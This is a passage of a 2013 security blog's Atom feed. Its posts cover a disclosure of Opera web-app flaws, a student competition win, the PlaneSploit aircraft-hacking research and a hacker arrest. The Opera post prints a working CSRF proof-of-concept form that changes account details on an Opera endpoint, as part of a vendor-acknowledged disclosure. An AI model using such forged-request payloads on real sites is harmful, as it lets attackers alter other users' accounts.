&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/LUI_mO7nnwc" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/4456024198548604877/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/04/hacking-windows-servers-privilege.html#comment-form" title="5 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4456024198548604877?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/4456024198548604877?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/LUI_mO7nnwc/hacking-windows-servers-privilege.html" title="Hacking Windows Servers - Privilege Escalation " /><author><name>Rafay Baloch</name><uri>https://plus.google.com/113902000528448760189</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh4.googleusercontent.com/-QFpq0g9Pn_g/AAAAAAAAAAI/AAAAAAAACjo/gm2BoL3un_A/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-UrLtyYiYn_E/UXqi36trRRI/AAAAAAAACx8/PvMIguKthio/s72-c/hacking+windows+using+linux.jpg" height="72" width="72" /><thr:total>5</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/04/hacking-windows-servers-privilege.html</feedburner:origLink></entry><entry gd:etag="W/&quot;C0MHRn0yeyp7ImA9WhBVEk4.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-3340937732501461264</id><published>2013-04-17T10:20:00.000-07:00</published><updated>2013-04-17T13:43:57.393-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-04-17T13:43:57.393-07:00</app:edited><title>Stored XSS, CSRF And Clickjacking Vulnerabilities in Opera</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-5Oc03wF13Y8/UW7PVB_66SI/AAAAAAAACxM/uTQdh943OlI/s1600/Opera.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="240" src="http://2.bp.blogspot.com/-5Oc03wF13Y8/UW7PVB_66SI/AAAAAAAACxM/uTQdh943OlI/s320/Opera.jpg" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Now a days, I am not much active in bug bounty programs, However, still i wanted to share my experience with Opera, Opera does not have a bug bounty program, However they certainly have their own way of thanking researchers by sending them some swag and listing their name under Hall of fame.&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
I reported few&amp;nbsp;vulnerabilities&amp;nbsp;to opera including a Stored XSS, CSRF and a clickjacking vulnerability. The POC's for the&amp;nbsp;vulnerabilities&amp;nbsp;are as follows:&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Stored XSS&amp;nbsp;&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-7g-hcSKIiaY/UW6PNf-AFLI/AAAAAAAACw8/_0coWzDcnAc/s1600/OPERA.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="280" src="http://3.bp.blogspot.com/-7g-hcSKIiaY/UW6PNf-AFLI/AAAAAAAACw8/_0coWzDcnAc/s640/OPERA.png" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
The &lt;b&gt;"Username"&lt;/b&gt; input was not being sanitized properly, Which resulted in an execution of javascript.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;CSRF POC&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
The form was missing with CSRF tokens, An attacker could have used a CSRF attack in order to manipulate the form details.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;POC&lt;/b&gt;&lt;br /&gt;
&lt;div style="font-weight: bold;"&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;i&gt;&amp;lt;html&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp;&amp;nbsp;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;lt;body&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;lt;form action="https://apps.opera.com/en_pk/account.php?action=details" method="POST"&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;input type="hidden" name="email" value="rafaybaloch&amp;amp;#64;gmail&amp;amp;#46;com" /&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;input type="hidden" name="name" value="Rafay&amp;amp;#32;Baloch" /&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;input type="hidden" name="address1" value="f&amp;amp;#45;10&amp;amp;#44;afasf&amp;amp;#32;afs&amp;amp;#32;asf&amp;amp;#32;1&amp;amp;#44;block&amp;amp;#32;15&amp;amp;#32;near&amp;amp;#32;income&amp;amp;#32;tax&amp;amp;#32;office&amp;amp;#44;asssssss&amp;amp;#45;e&amp;amp;#45;johar" /&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;input type="hidden" name="address2" value="" /&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;input type="hidden" name="city" value="Karachi" /&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;input type="hidden" name="state" value="" /&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;input type="hidden" name="country" value="PK" /&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;input type="hidden" name="zip" value="44000" /&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;input type="hidden" name="phone" value="&amp;amp;#43;923333333333" /&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;nbsp; &amp;lt;input type="submit" value="Submit form" /&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;nbsp; &amp;lt;/form&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;nbsp; &amp;lt;/body&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;i&gt;&amp;lt;/html&amp;gt;&lt;/i&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;b&gt;Opera Hall Of Fame&lt;/b&gt;&lt;br /&gt;
&lt;br /&gt;
So, For my findings, Opera listed my name under their hall of fame:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-TGxhHPyg9g8/UW7_-y6YWXI/AAAAAAAACxk/hOusp8PbVeU/s1600/164685_10151461794588001_940281350_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="416" src="http://3.bp.blogspot.com/-TGxhHPyg9g8/UW7_-y6YWXI/AAAAAAAACxk/hOusp8PbVeU/s640/164685_10151461794588001_940281350_n.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;Gift from Opera&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
As a token of appreciation, they also send me the following gifts:&lt;br /&gt;
&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-uvIcr5KbBTU/UW8BhLyK2-I/AAAAAAAACxs/FypZ0mya90Q/s1600/WP_20130417_002.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="360" src="http://1.bp.blogspot.com/-uvIcr5KbBTU/UW8BhLyK2-I/AAAAAAAACxs/FypZ0mya90Q/s640/WP_20130417_002.jpg" width="577" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;br /&gt;&lt;/div&gt;
Opera is still sending some good stuff, I would recommend researchers to start looking opera's subdomains for low hanging fruits such as XSS, I know there is a lot of vulnerabilities out there unfixed.&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AmArpxY2Jfk:hqcyIUS1wEs:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AmArpxY2Jfk:hqcyIUS1wEs:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AmArpxY2Jfk:hqcyIUS1wEs:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=AmArpxY2Jfk:hqcyIUS1wEs:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AmArpxY2Jfk:hqcyIUS1wEs:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=AmArpxY2Jfk:hqcyIUS1wEs:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AmArpxY2Jfk:hqcyIUS1wEs:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AmArpxY2Jfk:hqcyIUS1wEs:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=AmArpxY2Jfk:hqcyIUS1wEs:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=AmArpxY2Jfk:hqcyIUS1wEs:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=AmArpxY2Jfk:hqcyIUS1wEs:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/AmArpxY2Jfk" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/3340937732501461264/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/04/stored-xss-csrf-and-clickjacking.html#comment-form" title="4 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/3340937732501461264?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/3340937732501461264?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/AmArpxY2Jfk/stored-xss-csrf-and-clickjacking.html" title="Stored XSS, CSRF And Clickjacking Vulnerabilities in Opera" /><author><name>Rafay Baloch</name><uri>https://plus.google.com/113902000528448760189</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh4.googleusercontent.com/-QFpq0g9Pn_g/AAAAAAAAAAI/AAAAAAAACjo/gm2BoL3un_A/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://2.bp.blogspot.com/-5Oc03wF13Y8/UW7PVB_66SI/AAAAAAAACxM/uTQdh943OlI/s72-c/Opera.jpg" height="72" width="72" /><thr:total>4</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/04/stored-xss-csrf-and-clickjacking.html</feedburner:origLink></entry><entry gd:etag="W/&quot;A0IEQH8yfCp7ImA9WhBVEEg.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-9086851159865661986</id><published>2013-04-15T13:57:00.001-07:00</published><updated>2013-04-15T13:58:21.194-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-04-15T13:58:21.194-07:00</app:edited><category scheme="http://www.blogger.com/atom/ns#" term="Others" /><title>Won Network Designing Competition At PROCOM 2013</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-bk1Bcvbe8Xo/UWxnHuGeP8I/AAAAAAAACwk/Ve0uP17Irf8/s1600/544372_206051142873964_1748635807_n-620x315.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="203" src="http://1.bp.blogspot.com/-bk1Bcvbe8Xo/UWxnHuGeP8I/AAAAAAAACwk/Ve0uP17Irf8/s400/544372_206051142873964_1748635807_n-620x315.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
I am sorry friends as i haven't been able to post as i was really busy with some pentesting projects and my research. Now a days doing more learning part than teaching part. When i came in to hacking scene 6 years before, I started with Network security, but later every thing shifted to layer 7 i.e. web. So i started researching web application security. However, a since network and web work together, we cannot&amp;nbsp;completely&amp;nbsp;deny the network security part.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;Recently,We participated in "&lt;b&gt;PROCOM 2013&lt;/b&gt;" on behalf of &lt;b&gt;Bahria University karachi (Team name = White Tigers)&lt;/b&gt;&amp;nbsp;along with my two friends &lt;b&gt;"Mudassir"&lt;/b&gt; and &lt;b&gt;"Zia khan"&lt;/b&gt; and by the grace of Almighty Allah we managed to win the competition. Procom is the largest educational event that takes place every year in Fast University, it hosts more than 40 competition including speed programming, network designing, painting etc etc.&lt;br /&gt;
&lt;div&gt;
&lt;br /&gt;&lt;/div&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://3.bp.blogspot.com/-kFu1tzQgDFk/UWxpWioNxsI/AAAAAAAACws/HjsH_yUpR8w/s1600/305969_245864762225935_2124462853_n.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="175" src="http://3.bp.blogspot.com/-kFu1tzQgDFk/UWxpWioNxsI/AAAAAAAACws/HjsH_yUpR8w/s400/305969_245864762225935_2124462853_n.jpg" width="400" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;div&gt;
&lt;br /&gt;
The competition was based on 5 rounds, which would test both&amp;nbsp;theoretical&amp;nbsp;and practical knowledge of the students. The major advantage was that lots of questions came from network security, which b.w i have been studying for few years. The things i learned from my CCNP route course also came into play and helped me a lot. My friend mudassir did really well too, he is dong his CCIE and is very sound in networking stuff.&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
&lt;b&gt;What's Next?&lt;/b&gt;&lt;br /&gt;
&lt;b&gt;&lt;br /&gt;&lt;/b&gt;
Well, I would continue my research with Network and web application security, I am also writing a book on &lt;b&gt;"Advanced Ethical Hacking"&lt;/b&gt;, which b/w i am hoping to finish it this year.&amp;nbsp;However apart from that, i would also move to programming side and participate in &lt;b&gt;"Speed Programming Contest"&lt;/b&gt;&amp;nbsp;and atleast winning it once.&lt;br /&gt;
&lt;br /&gt;
I would love to hear from you the&amp;nbsp;suggestions on improving at speed programming, either leave a comment or mail me directly at &lt;b&gt;rafayhackingarticles@gmail.com&lt;/b&gt;.&amp;nbsp;&amp;nbsp;&lt;/div&gt;
&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=HdikN8zO988:HYfS_Ig6NBA:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=HdikN8zO988:HYfS_Ig6NBA:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=HdikN8zO988:HYfS_Ig6NBA:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=HdikN8zO988:HYfS_Ig6NBA:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=HdikN8zO988:HYfS_Ig6NBA:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=HdikN8zO988:HYfS_Ig6NBA:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=HdikN8zO988:HYfS_Ig6NBA:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=HdikN8zO988:HYfS_Ig6NBA:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=HdikN8zO988:HYfS_Ig6NBA:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=HdikN8zO988:HYfS_Ig6NBA:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=HdikN8zO988:HYfS_Ig6NBA:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/HdikN8zO988" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/9086851159865661986/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/04/won-network-designing-competition-procom.html#comment-form" title="1 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/9086851159865661986?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/9086851159865661986?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/HdikN8zO988/won-network-designing-competition-procom.html" title="Won Network Designing Competition At PROCOM 2013" /><author><name>Rafay Baloch</name><uri>https://plus.google.com/113902000528448760189</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="32" height="32" src="//lh4.googleusercontent.com/-QFpq0g9Pn_g/AAAAAAAAAAI/AAAAAAAACjo/gm2BoL3un_A/s512-c/photo.jpg" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-bk1Bcvbe8Xo/UWxnHuGeP8I/AAAAAAAACwk/Ve0uP17Irf8/s72-c/544372_206051142873964_1748635807_n-620x315.jpg" height="72" width="72" /><thr:total>1</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/04/won-network-designing-competition-procom.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DEEFQX07fip7ImA9WhBVEE0.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-8892554275046395732</id><published>2013-04-14T23:16:00.004-07:00</published><updated>2013-04-14T23:16:50.306-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-04-14T23:16:50.306-07:00</app:edited><title>Hijacking An Aircraft With An Android App</title><content type="html">&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://1.bp.blogspot.com/-5Lq277wUwhc/UWspMxwG9WI/AAAAAAAAAA4/6gCinRDlNWI/s1600/planesploit_android_app_to_hijack_airplanes_by_hugo_teso.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" height="320" src="http://1.bp.blogspot.com/-5Lq277wUwhc/UWspMxwG9WI/AAAAAAAAAA4/6gCinRDlNWI/s1600/planesploit_android_app_to_hijack_airplanes_by_hugo_teso.jpg" width="230" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
Well vulnerabilities that never going to end, or should we say vulnerabilities and new inventions walk side by side.&lt;br /&gt;
Recently a terrifying prospect, a hack that allows an attacker to take control of plane navigation and cockpit systems has been revealed at a security conference in Europe. An Android application called PlaneSploit that would allow remotely attack and hijack commercial aircraft. This app is developed by Hugo Teso, a researcher at security consultancy N.Runs in Germany who's also a commercial airline pilot.&lt;br /&gt;
&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;br /&gt;
He further added,"He explained that by building an exploit framework called Simon and a complimentary Android app that delivers attack messages, he could manipulate a plane's path as he saw fit." &lt;br /&gt;
With these vulnerabilities in mind, he used virtual planes in a lab to demonstrate his ability to hijack a plane rather than attempting to take over a real flight as that was “too dangerous and unethical.” He used ACARS to gain access to the plane’s onboard computer system and uploaded Flight Management System data.&lt;br /&gt;
&lt;br /&gt;
"I expected them to have security issues but I did not expect them to be so easy to spot. I thought I would have to fight hard to get into them but it was not that difficult," Teso said.&lt;/div&gt;
&lt;div class="feedflare"&gt;
&lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ic4YyuLcZg0:gIP88dQxgWw:yIl2AUoC8zA"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=yIl2AUoC8zA" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ic4YyuLcZg0:gIP88dQxgWw:63t7Ie-LG7Y"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=63t7Ie-LG7Y" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ic4YyuLcZg0:gIP88dQxgWw:-BTjWOF_DHI"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=ic4YyuLcZg0:gIP88dQxgWw:-BTjWOF_DHI" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ic4YyuLcZg0:gIP88dQxgWw:V_sGLiPBpWU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=ic4YyuLcZg0:gIP88dQxgWw:V_sGLiPBpWU" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ic4YyuLcZg0:gIP88dQxgWw:qj6IDK7rITs"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?d=qj6IDK7rITs" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ic4YyuLcZg0:gIP88dQxgWw:gIN9vFwOqvQ"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=ic4YyuLcZg0:gIP88dQxgWw:gIN9vFwOqvQ" border="0"&gt;&lt;/img&gt;&lt;/a&gt; &lt;a href="http://feeds.feedburner.com/~ff/HackingAndCracking?a=ic4YyuLcZg0:gIP88dQxgWw:4cEx4HpKnUU"&gt;&lt;img src="http://feeds.feedburner.com/~ff/HackingAndCracking?i=ic4YyuLcZg0:gIP88dQxgWw:4cEx4HpKnUU" border="0"&gt;&lt;/img&gt;&lt;/a&gt;
&lt;/div&gt;&lt;img src="http://feeds.feedburner.com/~r/HackingAndCracking/~4/ic4YyuLcZg0" height="1" width="1"/&gt;</content><link rel="replies" type="application/atom+xml" href="http://www.rafayhackingarticles.net/feeds/8892554275046395732/comments/default" title="Post Comments" /><link rel="replies" type="text/html" href="http://www.rafayhackingarticles.net/2013/04/hijacking-aircraft-with-android-app.html#comment-form" title="2 Comments" /><link rel="edit" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8892554275046395732?v=2" /><link rel="self" type="application/atom+xml" href="http://www.blogger.com/feeds/3121270199089759062/posts/default/8892554275046395732?v=2" /><link rel="alternate" type="text/html" href="http://feedproxy.google.com/~r/HackingAndCracking/~3/ic4YyuLcZg0/hijacking-aircraft-with-android-app.html" title="Hijacking An Aircraft With An Android App" /><author><name>FaHaD aWaN</name><uri>http://www.blogger.com/profile/11388036707127075893</uri><email>noreply@blogger.com</email><gd:image rel="http://schemas.google.com/g/2005#thumbnail" width="16" height="16" src="http://img2.blogblog.com/img/b16-rounded.gif" /></author><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" url="http://1.bp.blogspot.com/-5Lq277wUwhc/UWspMxwG9WI/AAAAAAAAAA4/6gCinRDlNWI/s72-c/planesploit_android_app_to_hijack_airplanes_by_hugo_teso.jpg" height="72" width="72" /><thr:total>2</thr:total><feedburner:origLink>http://www.rafayhackingarticles.net/2013/04/hijacking-aircraft-with-android-app.html</feedburner:origLink></entry><entry gd:etag="W/&quot;DkQHRXY9fyp7ImA9WhBWFUk.&quot;"><id>tag:blogger.com,1999:blog-3121270199089759062.post-8141988278918301637</id><published>2013-04-09T14:52:00.000-07:00</published><updated>2013-04-09T14:52:14.867-07:00</updated><app:edited xmlns:app="http://www.w3.org/2007/app">2013-04-09T14:52:14.867-07:00</app:edited><title>Zeus Master turned down Israel</title><content type="html">&lt;br /&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="http://2.bp.blogspot.com/-LV6u9JUbGzE/UWSINFHh5WI/AAAAAAAAAAo/HiVWwjEawHQ/s1600/Algerian080113.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"&gt;&lt;img border="0" src="http://2.bp.blogspot.com/-LV6u9JUbGzE/UWSINFHh5WI/AAAAAAAAAAo/HiVWwjEawHQ/s1600/Algerian080113.jpg" height="182" width="320" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;Recently worldwide Hackers started #OpIsrael and targeted Israeli websites, which caused massive disruption to government, academic and private sites. According to the news/Media Israel asked Algerian Hamza the happiest hacker&amp;nbsp; to intervene to save Israel fro&lt;span style="font-size: small;"&gt;m &lt;/span&gt;&lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;the heavy losses in exchange for his release, but he refused to help them.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;a name='more'&gt;&lt;/a&gt;&lt;span style="font-size: small;"&gt; &lt;/span&gt;&lt;br /&gt;
&lt;br /&gt;
&lt;span style="font-size: small;"&gt;Hamza &lt;/span&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-size: small;"&gt;who hacked sensitive sites in the U.S. and then arrested
 by Interpol, US authorities accuse him of hacking into private accounts
 in more than 217 banks and financial companies worldwide, causing 
millions of dollars in losses. H&lt;span style="font-size: small;"&gt;e &lt;span style="font-size: small;"&gt;was arrested in T&lt;span style="font-size: small;"&gt;hailand when &lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;he was traveling with his family following a holiday in Malaysia &lt;b&gt;en route&lt;/b&gt; to Cairo, Egypt.&lt;br /&gt;
&lt;br /&gt;
"The arrest warrant specifically &lt;b&gt;mentioned &lt;/b&gt;that &lt;b&gt;bail&lt;/b&gt; is not allowed.'' The court said. &lt;br /&gt;
&lt;h4&gt;
About the author &lt;/h4&gt;
This article has been written by Fahad Awan, He is the newest author on RHA team.&lt;div class="feedflare"&gt;
